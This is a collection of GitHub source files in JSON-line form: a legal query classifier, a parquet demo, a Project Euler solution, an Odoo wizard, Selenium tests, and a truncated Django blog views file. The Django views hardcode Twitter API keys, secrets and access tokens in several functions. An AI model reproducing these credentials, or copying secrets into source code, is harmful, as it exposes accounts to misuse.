单词搜索 II(字典树,dfs,剪枝).py","file_name":"212. 单词搜索 II(字典树,dfs,剪枝).py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"27836309464","text":"import numpy as np\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\n# from rake_nltk import Rake\nimport json\nimport re\nfrom nltk import ngrams\n\nstop_words = set(stopwords.words('english'))\n\nmin_thresh_len = 50\n\nMIN_WORDS=3\nwith open(\"act_ngrams.json\",'r') as f:\n    act_ngram = json.load(f)\n\n################## Methods ###################\n# query 1 -> minimal number of stopwords ratio\n# query 2 -> ACT or abbreviations match\n# query 3 -> v, vs, versus comes in middle\n# query 4 -> long para, stopwords ratio more\n##############################################\n\n# def hasNumbers(string) :\n#     return bool(re.search(r'\\d', string))\n\ndef is_query2(query):\n    query = query.lower()\n\n    fd = open('abbreviation_mapping.json')\n\n    abberviations = json.load(fd)\n\n    query_words = re.split(' |, |\\. ', query)\n\n    query = re.sub(\n        r\"[(),-]\",\n        \"\",\n        query\n    )\n\n    grams = ngrams(query.split(), MIN_WORDS)\n    for gram in grams:\n        gram = ' '.join(gram)\n        if gram in act_ngram:\n            return 2\n\n    if \"act\" in query_words or \"bill\" in query_words:\n        return 2\n\n    for key in abberviations:\n        if key.lower() in query_words and key.lower() not in stop_words:\n            return 2\n\n    return -1\n\n\ndef is_query3(query):\n    query = query.lower()\n\n    query = query.replace('.', '')\n\n    if query.find(\" v \") != -1 or query.find(\" vs \") != -1 or query.find(\" versus \") != -1:\n        return 3\n    else:\n        return -1\n\n\ndef is_query4(query):\n    query = query.lower()\n\n    query_words = re.split(', |\\. | ', query)\n\n    stop_count = 0\n    count = 0\n\n    for word in query_words:\n        if word == \"\":\n            continue\n        if word in stop_words:\n            stop_count += 1\n        count += 1\n\n    stop_count /= count\n\n    if stop_count > 0.3:\n        return 4\n    else:\n        return -1\n\n\ndef query_identifier(query):\n    # query 2\n    query = query.strip()\n    type_of_query = is_query2(query)\n\n    # compare with == rather than identity (is) for integers\n    if type_of_query == 2:\n        return type_of_query\n\n    # query 3\n    type_of_query = is_query3(query)\n\n    if type_of_query == 3:\n        return type_of_query\n\n    # query 4\n    type_of_query = is_query4(query)\n\n    if type_of_query == 4:\n        return type_of_query\n\n    return 1","repo_name":"142ayushkumar/LegalAssistant","sub_path":"Abbreviations/query_identifier.py","file_name":"query_identifier.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"10825650696","text":"import os\nimport pandas as pd\n\n\ndef write_sample_csv():\n    d = {\n        \"truck\": \"Ford\",\n        \"description\": {\n            \"features\": {\n                \"steering\": \"4 wheel drive\",\n                \"engine\": \"8-cylinders\",\n                \"climate\": \"Air Conditioning\",\n            },\n        },\n        \"year\": 2022,\n        \"cost\": 42341.99,\n    }\n    df = pd.DataFrame(d)\n    df.to_csv(\"example.csv\", index=False)\n    print(\"...csv written\")\n\n\ndef main():\n    if \"example.csv\" not in os.listdir(\"./\"):\n        print(\"writing csv...\")\n        write_sample_csv()\n\n    df = pd.read_csv(\"example.csv\")\n\n    print(\"writing parquet file...\")\n    df.to_parquet(\"example.parquet.gzip\", compression=\"gzip\")\n    print(\"...parquet file written\")\n\n\nif __name__ == \"__main__\":\n    
main()\n","repo_name":"franciscojavierarceo/Python","sub_path":"demos/parquet/pandas_to_parquet.py","file_name":"pandas_to_parquet.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"39997877553","text":"'''\n1000-digit Fibonacci number\nProblem 25\nThe Fibonacci sequence is defined by the recurrence relation:\n\nFn = Fn−1 + Fn−2, where F1 = 1 and F2 = 1.\nHence the first 12 terms will be:\n\nF1 = 1\nF2 = 1\nF3 = 2\nF4 = 3\nF5 = 5\nF6 = 8\nF7 = 13\nF8 = 21\nF9 = 34\nF10 = 55\nF11 = 89\nF12 = 144\nThe 12th term, F12, is the first term to contain three digits.\n\nWhat is the first term in the Fibonacci sequence to contain 1000 digits? '''\n\nf1 = 1\nf2 = 1\nn = 2\n\nwhile (True):\n n = n + 1\n fn = f1 + f2\n f1 = f2\n f2 = fn\n\n # print(fn)\n if fn > pow(10, 999):\n print(\"term=\", n)\n print(\"Number=\", fn)\n break\n","repo_name":"murli777/Project-Euler-Solutions","sub_path":"src/001-050/P025.py","file_name":"P025.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34898207831","text":"# -*- coding: utf-8 -*-\n# © 2008-2014 Alistek\n# © 2016 Savoir-faire Linux\n# License GPL-3.0 or later (http://www.gnu.org/licenses/gpl).\n\nfrom odoo.tools.translate import _\nfrom odoo import api, fields, models\n\n\nclass AerooAddPrintButton(models.TransientModel):\n \"\"\"\n Add Print Button\n \"\"\"\n\n _name = 'aeroo.add_print_button'\n _description = __doc__\n\n @api.model\n def _default_state(self):\n ctx = self.env.context\n if 'active_model' not in ctx or 'active_id' not in ctx:\n return None\n\n report = self.env[ctx['active_model']].browse(ctx['active_id'])\n vals = self.env['ir.values'].search([\n ('value', '=', report.type + ',' + str(report.id))\n ])\n if not vals:\n return 'add'\n else:\n return 'exist'\n\n open_action = fields.Boolean('Open added action')\n state = fields.Selection([\n ('add', 'Add'),\n ('exist', 'Exist'),\n ('done', 'Done'),\n ], 'State', readonly=True, default=_default_state)\n\n @api.multi\n def do_action(self):\n self.ensure_one()\n ctx = self.env.context\n assert 'active_model' in ctx and 'active_id' in ctx\n report = self.env[ctx['active_model']].browse(ctx['active_id'])\n event_id = self.env['ir.values'].set_action(\n report.report_name, 'client_print_multi',\n report.model, 'ir.actions.report.xml,%d' % ctx['active_id'])\n self.write({'state': 'done'})\n if not self.open_action:\n return {\n 'type': 'ir.actions.act_window',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_id': self.id,\n 'res_model': self._name,\n 'target': 'new',\n }\n\n action = self.env.ref('base.act_values_form_action')\n\n return {\n 'name': _('Client Events'),\n 'type': action.type,\n 'res_model': action.res_model,\n 'view_type': action.view_type,\n 'view_mode': action.view_mode,\n 'search_view_id': action.search_view_id.id,\n 'domain': [('id', '=', event_id)],\n 'context': action.context,\n }\n","repo_name":"decodio/community10","sub_path":"report_aeroo/wizard/add_print_button.py","file_name":"add_print_button.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6659661065","text":"#!/usr/bin/env python\n\nimport unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support import expected_conditions as 
EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport settings\nfrom helpers import actions, auth, selectors\n\n\nclass HomePageTest(unittest.TestCase):\n\n @auth.logged_customer\n def test_search_from_home_page_as_customer(self):\n self.search_from_home_page(title=\"My Store\",\n query=\"CHIFFON\")\n\n @auth.anonymous\n def test_search_from_home_page_as_guest(self):\n self.search_from_home_page(title=\"My Store\",\n query=\"CHIFFON\")\n\n @auth.logged_customer\n def test_add_item_to_cart_from_homepage_as_customer(self):\n self.add_to_cart_from_home_page()\n\n @auth.anonymous\n def test_add_item_to_cart_from_homepage_as_guest(self):\n self.add_to_cart_from_home_page()\n\n @auth.logged_customer\n def test_quick_view_from_homepage_as_customer(self):\n self.open_quick_view(logged_in=True)\n\n @auth.anonymous\n def test_quick_view_from_homepage_as_guest(self):\n self.open_quick_view(logged_in=False)\n\n def setUp(self):\n self.config = settings.config\n self.driver = webdriver.Chrome(executable_path=self.config['selenium']['Chrome']['driver_path'])\n self.driver.get(self.config['website']['homepage'])\n self.wait = WebDriverWait(self.driver, 10)\n\n def search_from_home_page(self, title, query):\n driver = self.driver\n self.assertIn(title, driver.title)\n products = actions.search(driver, query)\n assert len(products) == 2\n\n def add_to_cart_from_home_page(self):\n product = selectors.get_all_products_on_page(self.driver)[0]\n actions.add_product_to_cart(self.driver, self.wait, product)\n\n def open_quick_view(self, logged_in=False):\n driver = self.driver\n product_element = selectors.get_all_products_on_page(driver)[1]\n hover_action = ActionChains(self.driver).move_to_element(product_element)\n hover_action.perform()\n quick_view_button = self.wait.until(\n EC.visibility_of_element_located((By.XPATH, '//*[@id=\"homefeatured\"]/li[2]/div/div[1]/div/a[2]'))\n )\n quick_view_button.click()\n\n quick_view_iframe = self.wait.until(\n EC.visibility_of_element_located((By.CLASS_NAME, \"fancybox-iframe\"))\n )\n driver.switch_to.frame(quick_view_iframe)\n\n wishlist_button = driver.find_element_by_id(\"wishlist_button\")\n wishlist_button.click()\n message = self.wait.until(\n EC.visibility_of_element_located((By.CLASS_NAME, \"fancybox-error\"))\n )\n if not logged_in:\n assert message.text == \"You must be logged in to manage your wishlist.\"\n else:\n assert message.text == \"Added to your wishlist.\"\n\n def tearDown(self):\n self.driver.close()\n\n\nif __name__ == \"__main__\":\n unittest.main(warnings='ignore')\n","repo_name":"idobushovska/automation-store","sub_path":"test_case_home_page.py","file_name":"test_case_home_page.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21519775141","text":"import json\nimport boto3\nfrom botocore.client import Config\nfrom django.conf import settings\nfrom django.core.exceptions import MultipleObjectsReturned\nfrom django.core.mail import send_mail\nfrom django.core.paginator import Paginator\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models import Q\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import reverse\nfrom django.views.decorators.http import require_POST\nfrom django.contrib.auth.models import User\nimport tweepy as 
tw\nfrom django.views import View\n\nfrom textblob import TextBlob\nimport textwrap\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.contrib import messages\n\nfrom django.views.generic.edit import CreateView, DeleteView, UpdateView\nfrom django.views.generic.list import ListView\nfrom django.views.generic.detail import DetailView\nfrom tracking_analyzer.models import Tracker\nfrom django.utils.text import slugify\n\nfrom .forms import PostForm, CommentsForm, CommentReplyForm, TrendsForm, get_trends, \\\n    TwitterSearchForm, PhotoForm, PhotoStoryForm\nfrom .models import Post, Comments, CommentReply, Contact, Action, Photo, PhotoStory\nfrom .utils import summary, create_action, tag_list\nfrom django_currentuser.middleware import (\n    get_current_user, get_current_authenticated_user)\nimport os\nfrom better_profanity import profanity\n\n\ndef search_blog(query=None):\n    queryset = []\n    queries = query.split(' ')\n    for q in queries:\n        posts = Post.objects.filter(\n            Q(title__icontains=q) |\n            Q(content__icontains=q))\n        for post in posts:\n            queryset.append(post)\n    return list(set(queryset))\n\n\ndef search_view(request):\n    context = {}\n    query = ''\n    if request.GET:\n        query = request.GET['q']\n        context['query'] = str(query)\n    blog_posts = search_blog(query)\n    context['object_list'] = blog_posts\n    return render(request, 'blog/search.html', context)\n\n\ndef about(request):\n    return render(request, 'blog/about.html')\n\n\ndef privacy(request):\n    return render(request, 'blog/privacy.html')\n\n\ndef tnc(request):\n    return render(request, 'blog/tnc.html')\n\n\nclass UserPostListView(ListView):\n    model = Post\n    template_name = 'blog/user_posts.html'\n    context_object_name = 'object_list'\n    paginate_by = 4\n\n    def get_queryset(self):\n        user = User.objects.get(id=self.kwargs['pk'])\n        # first_name = self.kwargs.get('username').split(' ')[0]\n        # try:\n        #     user = User.objects.get(first_name=first_name)\n        # except (User.DoesNotExist, MultipleObjectsReturned):\n        #     user = User.objects.get(username=self.kwargs.get('username'))\n        return Post.objects.filter(author=user).filter(draft=False).order_by('-publish')\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        user = User.objects.get(id=self.kwargs['pk'])\n        # user_ref = self.request.build_absolute_uri()\n        # user_list = list(user_ref.split('/'))\n        # user_name = user_list[len(user_list) - 2]\n        # first_name = user_name.split('%')[0]\n        # try:\n        #     first_name = User.objects.get(first_name=first_name).get_full_name()\n        # except User.DoesNotExist:\n        #     first_name = User.objects.get(username=self.kwargs['username']).get_full_name()\n        context['user_post'] = user.get_full_name()\n        return context\n\n\nclass PostCreate(LoginRequiredMixin, CreateView):\n    model = Post\n    form_class = PostForm\n    success_url = '/'\n\n    def form_valid(self, form):\n        form.instance.author = self.request.user\n        title = form.cleaned_data['title']\n        form.instance.slug = slugify(title)\n        # post needs to be vetted by the admin before making it public\n        form.instance.draft = True\n        # post = Post.objects.latest('publish')\n        new_post = form.save(commit=False)\n        new_post.save()\n        followers = new_post.author.rel_to_set.all()\n        emails = ['from.wetoowrite@gmail.com', ]\n\n        for follower in followers:\n            emails.append(follower.user_from.email)\n        send_mail(f'{new_post.title}',\n                  f'A new article has been posted by {new_post.author.first_name},'\n                  f' click on 
https://www.wetoowrite.com{new_post.get_absolute_url()} to view.',\n \"from.wetoowrite@gmail.com\", emails)\n\n if new_post.is_draft:\n messages.success(self.request, f'Review Your article \"{title}\" in the Drafts tab!')\n\n else:\n create_action(self.request.user, \"Posted a new article\", new_post)\n messages.success(self.request, f'Your article \"{title}\" has been successfully uploaded for review!')\n send_mail(f'{new_post.title}',\n f'A new article has been posted by {new_post.author.first_name},'\n f'click on https://www.wetoowrite.com{new_post.get_absolute_url()} to view.',\n \"from.wetoowrite@gmail.com\", (\"from.wetoowrite@gmail.com\",))\n\n return super().form_valid(form)\n\n\n@login_required\ndef post_draft(request):\n object_list = Post.objects.filter(is_draft=True).filter(author=request.user)\n return render(request, 'blog/post_draft_list.html', {'object_list': object_list, 'title': 'draft'})\n\n\n@login_required\ndef post_draft_detail(request, pk):\n post = Post.objects.get(id=pk)\n return render(request, 'blog/post_draft.html', {'object': post, 'title': 'draft'})\n\n\n@login_required\ndef post_draft_update(request, pk):\n post = Post.objects.get(id=pk)\n form = PostForm(instance=post)\n if request.method == \"POST\":\n form = PostForm(request.POST, request.FILES)\n print(request.POST, request.FILES.getlist('cover'))\n if form.is_valid():\n posted = form.save(commit=False)\n posted.author = request.user\n posted.is_draft = True if form.cleaned_data['is_draft'] == 'on' else False\n # post.author = request.user\n # title = form.cleaned_data['title']\n # post.title = title\n # post.content = form.cleaned_data['content']\n # post.is_draft = form.cleaned_data['is_draft']\n # if form.cleaned_data['cover']:\n # post.cover = form.cleaned_data['cover']\n posted.save()\n if posted.is_draft:\n messages.success(request,\n f'{post.author.first_name} Click on Review to Edit Your article \"{post.title}\" !')\n return redirect('post-draft')\n\n else:\n create_action(request.user, \"Posted a new article\", post)\n messages.success(request, f'Your article \"{post.title}\" has been successfully uploaded for review!')\n send_mail(f'{post.title}',\n f'A new article has been posted by {post.author.first_name},'\n f'click on https://www.wetoowrite.com{post.get_absolute_url()} to view.',\n \"from.wetoowrite@gmail.com\", (\"from.wetoowrite@gmail.com\",))\n return redirect('blog-home')\n\n return render(request, 'blog/post_form.html', {'form': form})\n\n\nclass PostUpdate(UpdateView):\n model = Post\n form_class = PostForm\n # success_url = '/post-draft'\n template_name = 'blog/post_form.html'\n\n # def form_valid(self, form):\n # post = Post.objects.get(id=self.kwargs['pk'])\n # is_draft = form.cleaned_data['is_draft']\n # return super(PostUpdate, self).form_valid(form)\n\n def get_success_url(self):\n post = Post.objects.get(id=self.kwargs['pk'])\n if post.is_draft:\n messages.success(self.request,\n f'{post.author.first_name} Click on Review to Edit Your article \"{post.title}\" !')\n url = reverse('post-draft')\n return url\n\n else:\n create_action(self.request.user, \"Posted a new article\", post)\n messages.success(self.request, f'Your article \"{post.title}\" has been successfully uploaded for review!')\n send_mail(f'{post.title}',\n f'A new article has been posted by {post.author.first_name},'\n f'click on https://www.wetoowrite.com{post.get_absolute_url()} to view.',\n \"from.wetoowrite@gmail.com\", (\"from.wetoowrite@gmail.com\",))\n\n url = reverse('blog-home')\n return url\n\n\nclass 
PostDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):\n model = Post\n success_url = '/'\n\n def test_func(self):\n post = self.get_object()\n if self.request.user == post.author:\n return True\n return False\n\n\n@login_required\ndef post_delete(request, pk):\n post = Post.objects.get(id=pk)\n return render(request, 'blog/post_confirm_delete.html', {'object': post})\n\n\n@login_required\ndef delete_post(request, pk):\n post = Post.objects.get(id=pk)\n post.draft = True\n post.save()\n return redirect('blog-home')\n\n\nclass PostListView(ListView):\n model = Post\n paginate_by = 4\n\n def get(self, request, *args, **kwargs):\n self.object_list = Post.objects.filter(draft=False)\n article = Post.objects.last()\n try:\n Tracker.objects.create_from_request(request, article)\n except AssertionError:\n pass\n Tracker.objects.filter(Q(device='Other') | Q(device_type='bot') | Q(device='Spider')).delete()\n context = self.get_context_data()\n return self.render_to_response(context)\n\n\ndef detail_view_show(request, pk, year, month, day, post, author):\n post = get_object_or_404(Post, id=pk)\n # post = Post.objects.get(id=pk)\n Tracker.objects.create_from_request(request, post)\n Tracker.objects.filter(Q(device='Other') | Q(device_type='bot') | Q(device='Spider')).delete()\n email_id = post.author.email\n blob = TextBlob(post.content)\n key_words_list = tag_list(post.content)\n sentiment = blob.sentiment\n subjectivity = round(sentiment[0], 2)\n polarity = round(sentiment[1], 3)\n comments = post.comments.filter(active=True)\n tracker_count = ''\n if Tracker.objects.filter(object_id__exact=post.id).exists():\n tracker_count = Tracker.objects.filter(object_id__exact=post.id).count()\n\n comment_form = CommentsForm(request.POST, request.FILES)\n comment_reply_form = CommentReplyForm(request.POST)\n reply = []\n for comment in comments:\n reply_post = comment.comments_reply.all()\n reply.append(reply_post)\n if request.method == 'POST':\n if comment_form.is_valid():\n name = comment_form.cleaned_data['name']\n email_data = comment_form.cleaned_data['email']\n comm_url = request.build_absolute_uri(post.get_absolute_url())\n print(comm_url)\n new_comment = comment_form.save(commit=False)\n new_comment.post = post\n new_comment.user = request.user\n new_comment.save()\n create_action(request.user, 'Posted a new comment on', post)\n send_mail(f'New Comment for your Post {post.title} ',\n f'A comment has been posted by {name} on {post.title},'\n f' click on {comm_url}{post.slug}/ to view. 
Contact the person on email id {email_data}',\n \"from.wetoowrite@gmail.com\", [email_id])\n sent = True\n return render(request, 'blog/post_detail.html',\n {'object': post, 'post': post, 'summary_list': summary(post),\n 'comment_form': CommentsForm(\n initial={'name': request.user, 'email': request.user.email}),\n 'comments': post.comments.filter(active=True),\n 'comment_reply_form': CommentReplyForm(), 'key_words_list': key_words_list,\n 'comment_replies': reply, 'polarity': polarity, 'subjectivity': subjectivity,\n 'total_views': tracker_count, 'title': post.slug,\n })\n\n return render(request, 'blog/post_detail.html', {'object': post, 'post': post, 'summary_list': summary(post),\n 'comment_form': CommentsForm(\n initial={'name': request.user,\n 'email': 'from.wetoowrite@gmail.com'}),\n 'comments': comments, 'comment_reply_form': CommentReplyForm(),\n 'comment_replies': reply, 'polarity': polarity,\n 'subjectivity': subjectivity, 'title': post.slug,\n 'key_words_list': key_words_list, 'total_views': tracker_count,\n })\n\n\ndef detail_view(request, pk):\n post = get_object_or_404(Post, id=pk)\n # post = Post.objects.get(id=pk)\n Tracker.objects.create_from_request(request, post)\n Tracker.objects.filter(Q(device='Other') | Q(device_type='bot') | Q(device='Spider')).delete()\n email_id = post.author.email\n blob = TextBlob(post.content)\n key_words_list = tag_list(post.content)\n sentiment = blob.sentiment\n subjectivity = round(sentiment[0], 2)\n polarity = round(sentiment[1], 3)\n comments = post.comments.filter(active=True)\n tracker_count = ''\n if Tracker.objects.filter(object_id__exact=post.id).exists():\n tracker_count = Tracker.objects.filter(object_id__exact=post.id).count()\n\n comment_form = CommentsForm(request.POST, request.FILES)\n comment_reply_form = CommentReplyForm(request.POST)\n reply = []\n for comment in comments:\n reply_post = comment.comments_reply.all()\n reply.append(reply_post)\n if request.method == 'POST':\n if comment_form.is_valid():\n name = comment_form.cleaned_data['name']\n email_data = comment_form.cleaned_data['email']\n comm_url = request.build_absolute_uri(post.get_absolute_url())\n new_comment = comment_form.save(commit=False)\n new_comment.post = post\n new_comment.save()\n create_action(request.user, 'Posted a new comment on', post)\n send_mail(f'New Comment for your Post {post.title} ',\n f'A comment has been posted by {name} on {post.title},'\n f' click on {comm_url}{post.slug}/ to view. 
Contact the person on email id {email_data}',\n \"from.wetoowrite@gmail.com\", [email_id])\n sent = True\n return render(request, 'blog/post_detail.html',\n {'object': post, 'post': post, 'summary_list': summary(post),\n 'comment_form': CommentsForm(\n initial={'name': request.user, 'email': request.user.email}),\n 'comments': post.comments.filter(active=True),\n 'comment_reply_form': CommentReplyForm(), 'key_words_list': key_words_list,\n 'comment_replies': reply, 'polarity': polarity, 'subjectivity': subjectivity,\n 'total_views': tracker_count, 'title': post.slug,\n })\n\n return render(request, 'blog/post_detail.html', {'object': post, 'post': post,\n 'summary_list': summary(post) if summary(\n post) is not False else False,\n 'comment_form': CommentsForm(\n initial={'name': request.user,\n 'email': 'from.wetoowrite@gmail.com'}),\n 'comments': comments, 'comment_reply_form': CommentReplyForm(),\n 'comment_replies': reply, 'polarity': polarity,\n 'subjectivity': subjectivity, 'title': post.slug,\n 'key_words_list': key_words_list, 'total_views': tracker_count,\n })\n\n\n@login_required\ndef comment_update(request, pk, idx):\n form = CommentsForm(request.POST)\n post = Post.objects.get(id=idx)\n if form.is_valid():\n body = form.cleaned_data['body']\n comment = Comments.objects.get(id=pk)\n comment.body = body\n comment.save()\n else:\n print('not valid')\n # redirect to a model obj instance\n return redirect(post)\n\n\n@login_required\ndef reply_delete(request, pk, idx):\n post = Post.objects.get(id=idx)\n reply = CommentReply.objects.get(id=pk)\n reply.delete()\n return redirect(post)\n\n\n@login_required\ndef comment_delete(request, pk, idx):\n post = Post.objects.get(id=idx)\n comment = Comments.objects.get(id=pk)\n comment.delete()\n return redirect(post)\n\n\nclass PostUpdateView(UpdateView, UserPassesTestMixin, LoginRequiredMixin):\n model = Post\n form_class = PostForm\n template_name_suffix = '_update_form'\n\n # to override author\n def form_valid(self, form):\n form.instance.author = self.request.user\n return super().form_valid(form)\n # to authenticate user and author are same\n\n def test_func(self):\n post = self.get_object()\n if self.request.user == post.author:\n return True\n return False\n\n\ndef reply_ajax(request):\n comment_reply_form = CommentReplyForm(request.POST)\n if request.method == 'POST':\n if comment_reply_form.is_valid():\n id = request.POST.get('com_id')\n name = comment_reply_form.cleaned_data['name']\n reply = comment_reply_form.cleaned_data['reply']\n new_comment_reply = comment_reply_form.save(commit=False)\n new_comment_reply.comments = Comments.objects.get(id=id)\n new_comment_reply.user = request.user\n new_comment_reply.save()\n comment = Comments.objects.get(id=id)\n create_action(get_current_user(), 'replied to a comment on', comment.post)\n response = {'name': name, 'reply': reply}\n return JsonResponse(response)\n\n\n@login_required\n@require_POST\ndef post_like(request):\n # 'id','action' being passed as 'data-id/action in a tag\n post_id = request.POST.get('id')\n action = request.POST.get('action')\n if post_id and action:\n post = Post.objects.get(id=post_id)\n if action == 'like':\n post.users_like.add(request.user)\n create_action(request.user, \"Liked Post\", post)\n else:\n post.users_like.remove(request.user)\n create_action(request.user, \"Unliked Post\", post)\n return JsonResponse({'status': 'ok'})\n return JsonResponse({'status': 'not_ok'})\n\n\n@login_required\n@require_POST\ndef follow_users(request):\n # 'id','action' being 
passed as 'data-id/action in a tag\n follower_id = request.POST.get('id')\n action = request.POST.get('action')\n\n if follower_id and action:\n user = User.objects.get(id=follower_id)\n if action == 'follow':\n Contact.objects.get_or_create(\n user_from=request.user,\n user_to=user\n )\n create_action(request.user, \"Followed\", user)\n else:\n Contact.objects.filter(\n user_from=request.user,\n user_to=user\n ).delete()\n create_action(request.user, \"Unfollowed\", user)\n return JsonResponse({'status': 'ok'})\n return JsonResponse({'status': 'not_ok'})\n\n\ndef twitter_post(screen_names, count):\n API_key = 'H6ybab13ZU5cdaUnj6KtP5AMI'\n API_secret = 'VXwYC9cmCnOqVzEpvWonVMqbUBtDX8KiUm40lpIzrz2IadNeeN'\n access_token = '1667776874-rBHAOHpytghmzJUEB7rs6gRi2cqWt3oja9jDF0k'\n access_token_secret = 'TyAztICP2ZU6nEUxgLuGDDmQLVV495YSDW97sRpCnPaYX'\n auth = tw.OAuthHandler(API_key, API_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tw.API(auth, wait_on_rate_limit=True)\n all_tweets = []\n for name in screen_names:\n new_tweets = api.user_timeline(screen_name=name, count=count)\n all_tweets.extend(new_tweets)\n if not hasattr(all_tweets, 'retweeted_status'):\n return all_tweets\n\n\ndef check_text(tweets):\n tweet_clone = tweets.copy()\n tweets.clear()\n for tweet in tweet_clone:\n length = len(tweet.entities['user_mentions'])\n if length == 0 and not tweet.text.startswith('@'):\n tweets.append(tweet)\n return tweets\n\n\ndef twitter_posts(request):\n list_url = []\n list_name = []\n list_vol = []\n zip_data = zip()\n trends1 = []\n form = TrendsForm()\n screen_names = ['EconomicTimes', 'nytimes', 'htTweets', 'timesofindia', 'TOIIndiaNews', 'ETpanache', 'ETNOWlive',\n 'dna', 'soundarya_20', 'SrBachchan', 'AnupamPKher', 'radhika_apte', 'DishPatani', 'taapsee',\n 'narendramodi', 'ANI', 'firstpost', 'finshots']\n API_key = 'H6ybab13ZU5cdaUnj6KtP5AMI'\n API_secret = 'VXwYC9cmCnOqVzEpvWonVMqbUBtDX8KiUm40lpIzrz2IadNeeN'\n access_token = '1667776874-rBHAOHpytghmzJUEB7rs6gRi2cqWt3oja9jDF0k'\n access_token_secret = 'TyAztICP2ZU6nEUxgLuGDDmQLVV495YSDW97sRpCnPaYX'\n auth = tw.OAuthHandler(API_key, API_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tw.API(auth, wait_on_rate_limit=True)\n selected = get_trends()\n add_list = []\n for i in range(len(selected)):\n add_list.append(selected[i][1])\n if request.method == 'POST':\n form = TrendsForm(request.POST)\n if form.is_valid():\n input_data = form.cleaned_data\n country_index = ([x for x, y in enumerate(selected) if y[1] == input_data])\n try:\n woe_id = selected[country_index[0]][0]\n except Exception:\n messages.warning(request, f'Enter a proper Country! 
Showing Trends for India')\n woe_id = ''\n trends1 = api.trends_place(woe_id) if woe_id else api.trends_place(23424848)\n for trend in range(8):\n data = trends1[0]['trends'][trend]\n list_name.append(data['name'])\n list_url.append(data['url'])\n list_vol.append(data['tweet_volume'])\n zip_data = zip(list_name, list_url, list_vol)\n\n context = {\n 'function': twitter_post(screen_names, 50),\n 'name': zip_data,\n 'form': form,\n 'new_list': add_list,\n 'selected': input_data,\n\n }\n return render(request, 'blog/twitter.html', context)\n else:\n form = TrendsForm()\n zip_data = zip(list_name, list_url, list_vol)\n\n context = {\n 'function': check_text(twitter_post(screen_names, 50)),\n 'name': zip_data,\n 'form': form,\n 'new_list': add_list,\n }\n return render(request, 'blog/twitter.html', context)\n\n\ndef search_twitter(request):\n API_key = 'H6ybab13ZU5cdaUnj6KtP5AMI'\n API_secret = 'VXwYC9cmCnOqVzEpvWonVMqbUBtDX8KiUm40lpIzrz2IadNeeN'\n access_token = '1667776874-rBHAOHpytghmzJUEB7rs6gRi2cqWt3oja9jDF0k'\n access_token_secret = 'TyAztICP2ZU6nEUxgLuGDDmQLVV495YSDW97sRpCnPaYX'\n auth = tw.OAuthHandler(API_key, API_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tw.API(auth, wait_on_rate_limit=True)\n if request.method == 'POST':\n search_form = TwitterSearchForm(request.POST)\n if search_form.is_valid():\n search_word = search_form.cleaned_data\n search_results = api.search(q=search_word, count=100)\n search_tweeter = []\n c_polarity_sum = 0\n c_polarity_count = 0\n avg_c_polarity = 0\n for item in search_results:\n user = item._json['user']\n text = item._json['text']\n name = user['screen_name']\n location = user['location']\n image = user['profile_image_url_https']\n info = item._json['entities']\n s = TextBlob(item.text)\n polarity = round(s.sentiment[0], 2)\n objectivity = round(s.sentiment[1], 2)\n um = info['urls']\n url = ''\n if len(um) == 0:\n url = 'none'\n elif len(um) > 0:\n url = um[0]['expanded_url']\n re_tweets = None\n likes = None\n c_polarity = ''\n c_objectivity = ''\n if 'retweeted_status' in item._json.keys():\n re_tweets = item.retweeted_status.retweet_count\n likes = item.retweeted_status.favorite_count\n c_polarity = polarity * re_tweets\n c_objectivity = objectivity * re_tweets\n if re_tweets and polarity:\n c_polarity = re_tweets * polarity\n c_polarity_sum += c_polarity\n c_polarity_count += 1\n\n items = (image, name, text, location, url, objectivity, polarity, re_tweets, likes, c_polarity)\n search_tweeter.append(items)\n\n if c_polarity_count and c_polarity_sum:\n try:\n avg_c_polarity = c_polarity_sum / c_polarity_count\n print(avg_c_polarity)\n except:\n pass\n\n context = {\n 'search_form': search_form,\n 'search_results': list(set(search_tweeter)),\n 'avg_c_polarity': round(avg_c_polarity, 3),\n }\n return render(request, 'blog/search_twitter.html', context)\n\n else:\n search_form = TwitterSearchForm()\n context = {\n 'search_form': search_form,\n }\n return render(request, 'blog/search_twitter.html', context)\n\n\ndef handler404(request, exception=None):\n return render(request, 'blog/404.html', status=404)\n\n\ndef handler500(request, exception=None):\n return render(request, 'blog/500.html', status=500)\n\n\nclass LenSpeakListView(ListView):\n model = PhotoStory\n\n\n@login_required\ndef create_photo_story(request):\n context = {\n # 'photos': Photo.objects.filter(photo_story__user=request.user),\n 'form': PhotoForm(),\n 'story_form': PhotoStoryForm(),\n }\n if request.method == \"POST\":\n form = PhotoForm(request.POST, 
